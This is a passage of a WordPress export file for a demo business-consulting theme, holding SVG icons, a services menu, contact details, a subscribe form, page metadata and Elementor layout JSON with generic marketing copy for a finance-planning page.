<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home4.jpg" alt="" loading="lazy">								</a>
<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="" loading="lazy">
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1002</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:55:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:55:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2784cf1","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6b0b1f4","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6191f05","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"fa0c07e","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"508a439","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3808452","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2deb288","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"aed5597","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"18feed3","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"2687052","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0b9de86","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"75d682b","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"eb8a5b2","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"6315c9f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4d6ddf8","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#55BB53","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8083fb5","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ddfb0e2","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8ca6f1a","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3cf7ecd","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"fc883e9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"42bd250","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"2285a93","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"90b3f9e","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"0748676","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"02b4af2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home4.png","id":2074},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"153c642","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"17a1aa0","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #55bb53;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"66d8a4c","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"01b2f8e","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"388d72b","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"54dd58d","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"70d0b23","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"402a70c","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"df6115d","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"88e18e0","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#55BB53","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"6f19085","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"2d46fdb","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"d5f2cb2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"6e86112","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"6c1bc64","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"b727cfc","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"49fcb72","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"52b73d5","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"4307bab","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"ec48b7f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home4.jpg","id":2076},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"61060ce","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"db0badf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e7705cb","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"972f175","elType":"column","settings":{"_column_size":50,"_inline_size":18,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"7041300","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1956},"image_size":"full","align":"left","width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"d707766","elType":"column","settings":{"_column_size":50,"_inline_size":82,"_inline_size_tablet":100},"elements":[{"id":"4355e7c","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:4;s:10:"image_size";i:4;s:5:"align";i:2;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:5;s:11:"header_size";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;s:22:"typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3